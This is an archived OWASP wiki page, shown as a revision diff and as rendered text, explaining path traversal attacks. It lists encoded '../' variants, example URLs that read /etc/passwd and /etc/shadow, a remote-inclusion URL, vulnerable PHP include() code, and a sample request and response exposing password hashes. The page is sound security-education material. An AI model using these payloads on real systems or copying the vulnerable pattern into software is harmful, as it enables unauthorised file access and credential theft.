This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Path Traversal"
(→Related Attacks) |
|||
Line 1: | Line 1: | ||
{{Template:Attack}} | {{Template:Attack}} | ||
− | |||
==Description== | ==Description== | ||
Line 13: | Line 12: | ||
To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available. | To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available. | ||
+ | '''Request variations''' | ||
− | + | Encoding and double encoding: | |
− | |||
− | |||
%2e%2e%2f represents ../ | %2e%2e%2f represents ../ | ||
Line 32: | Line 30: | ||
..%c1%9c represents ..\ | ..%c1%9c represents ..\ | ||
+ | '''OS specific''' | ||
− | + | UNIX | |
− | |||
− | |||
Root directory: “ / “ | Root directory: “ / “ | ||
Directory separator: “ / “ | Directory separator: “ / “ | ||
− | + | WINDOWS | |
Root directory: “ <partition letter> : \ “ | Root directory: “ <partition letter> : \ “ | ||
Directory separator: “ / “ or “ \ ” | Directory separator: “ / “ or “ \ ” | ||
+ | == Severity == | ||
+ | |||
+ | High | ||
+ | |||
+ | == Likelihood of exploitation == | ||
+ | |||
+ | High | ||
==Examples == | ==Examples == | ||
Line 51: | Line 55: | ||
<nowiki> http://some_site.com.br/get-page.php?home=aaa.html </nowiki> | <nowiki> http://some_site.com.br/get-page.php?home=aaa.html </nowiki> | ||
<nowiki> http://some_site.com.br/some-page.asp?page=index.html </nowiki> | <nowiki> http://some_site.com.br/some-page.asp?page=index.html </nowiki> | ||
− | |||
In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex: | In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex: | ||
Line 62: | Line 65: | ||
<nowiki>http://some_site.com.br/../../../../etc/shadow </nowiki> | <nowiki>http://some_site.com.br/../../../../etc/shadow </nowiki> | ||
<nowiki>http://some_site.com.br/get-files?file=/etc/passwd </nowiki> | <nowiki>http://some_site.com.br/get-files?file=/etc/passwd </nowiki> | ||
− | |||
− | |||
Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc. | Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc. | ||
− | |||
===Example 2=== | ===Example 2=== | ||
It's also possible to include files, and scripts, located on external website, | It's also possible to include files, and scripts, located on external website, | ||
<nowiki> http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php </nowiki> | <nowiki> http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php </nowiki> | ||
− | |||
===Example 3=== | ===Example 3=== | ||
These examples illustrate a case when an attacker make the server show the CGI source code; | These examples illustrate a case when an attacker make the server show the CGI source code; | ||
<nowiki> http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi </nowiki> | <nowiki> http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi </nowiki> | ||
− | |||
=== Example 4=== | === Example 4=== | ||
Line 91: | Line 89: | ||
?> | ?> | ||
</nowiki></pre> | </nowiki></pre> | ||
− | |||
− | |||
An attack against this system could be to send the following HTTP request: | An attack against this system could be to send the following HTTP request: | ||
Line 99: | Line 95: | ||
Cookie: TEMPLATE=../../../../../../../../../etc/passwd | Cookie: TEMPLATE=../../../../../../../../../etc/passwd | ||
</pre> | </pre> | ||
− | |||
Generating a server response such as: | Generating a server response such as: | ||
Line 111: | Line 106: | ||
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh | phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh | ||
</pre> | </pre> | ||
− | |||
The repeated <tt>../</tt> characters after /home/users/phpguru/templates/ has caused | The repeated <tt>../</tt> characters after /home/users/phpguru/templates/ has caused | ||
[http://www.php.net/manual/en/function.include.php include()] to traverse to the root directory, and then include the UNIX password file [[passwd|/etc/passwd]]. | [http://www.php.net/manual/en/function.include.php include()] to traverse to the root directory, and then include the UNIX password file [[passwd|/etc/passwd]]. | ||
− | |||
UNIX etc/passwd is a common file used to demonstrate '''directory traversal''', as it is often used by crackers to try cracking the passwords. | UNIX etc/passwd is a common file used to demonstrate '''directory traversal''', as it is often used by crackers to try cracking the passwords. | ||
− | + | ==External References== | |
− | ==References== | ||
*http://cwe.mitre.org/data/definitions/22.html | *http://cwe.mitre.org/data/definitions/22.html | ||
*http://www.webappsec.org/projects/threat/classes/path_traversal.shtml | *http://www.webappsec.org/projects/threat/classes/path_traversal.shtml | ||
*http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV | *http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV | ||
− | |||
==Related Threats== | ==Related Threats== | ||
[[: Category: Information Disclosure]] | [[: Category: Information Disclosure]] | ||
− | |||
==Related Attacks== | ==Related Attacks== | ||
Line 138: | Line 128: | ||
==Related Vulnerabilities== | ==Related Vulnerabilities== | ||
[[:Category:Input Validation Vulnerability]] | [[:Category:Input Validation Vulnerability]] | ||
− | |||
==Related Countermeasures== | ==Related Countermeasures== | ||
Line 144: | Line 133: | ||
− | + | [[Category: Resource Manipulation]] | |
− | [[ | + | |
+ | [[Category: Attack]] |
Revision as of 16:51, 5 November 2007
- This is an Attack. To view all attacks, please see the Attack Category page.
Description
This attack aims to access files and directories that are stored outside web root folder. By browsing the application, one should look for absolute links to files stored on the web server and how this is done. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations it’s possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The idea is to use “../” sequences to move up to root directory, thus permitting to navigate thru file system.
This attack can be execute with a external malicious code injected on the path, the way of the Resource Injection attack, but it’s a Path Traversal attack
This attack is also named of “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available.
Request variations
Encoding and double encoding:
%2e%2e%2f represents ../ %2e%2e/ represents ../ ..%2f represents ../ %2e%2e%5c represents ..\ %2e%2e\ represents ..\ ..%5c represents ..\ %252e%252e%255c represents ..\ ..%255c represents ..\ and so on.
Unicode/UTF-8 Encoding (only for systems support UTF-8 sequences)
..%c0%af represents ../ ..%c1%9c represents ..\
OS specific
UNIX
Root directory: “ / “ Directory separator: “ / “
WINDOWS
Root directory: “ <partition letter> : \ “ Directory separator: “ / “ or “ \ ”
Severity
High
Likelihood of exploitation
High
Examples
Example 1
In order to identify the possibility to execute this attack, it’s needed to observe how the application deals with the resources in use. The following examples show some situations.
http://some_site.com.br/get-files.jsp?file=report.pdf http://some_site.com.br/get-page.php?home=aaa.html http://some_site.com.br/some-page.asp?page=index.html
In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex:
http://some_site.com.br/get-files?file=../../../../some dir/some file
Or
http://some_site.com.br/../../../../some dir/some file
The following URLs show examples of *NIX password file exploitation:
http://some_site.com.br/../../../../etc/shadow http://some_site.com.br/get-files?file=/etc/passwd
Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc.
Example 2
It's also possible to include files, and scripts, located on external website,
http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php
Example 3
These examples illustrate a case when an attacker make the server show the CGI source code;
http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi
Example 4
This example was extracted from: Wikipedia - Directory Traversal
A typical example of vulnerable application code is:
<?php $template = 'blue.php'; if ( is_set( $_COOKIE['TEMPLATE'] ) ) $template = $_COOKIE['TEMPLATE']; include ( "/home/users/phpguru/templates/" . $template ); ?>
An attack against this system could be to send the following HTTP request:
GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Generating a server response such as:
HTTP/1.0 200 OK Content-Type: text/html Server: Apache root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh daemon:*:1:1::/tmp: phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
The repeated ../ characters after /home/users/phpguru/templates/ has caused include() to traverse to the root directory, and then include the UNIX password file /etc/passwd.
UNIX etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.
External References
- http://cwe.mitre.org/data/definitions/22.html
- http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
- http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV
Related Threats
Category: Information Disclosure
Related Attacks
Related Vulnerabilities
Category:Input Validation Vulnerability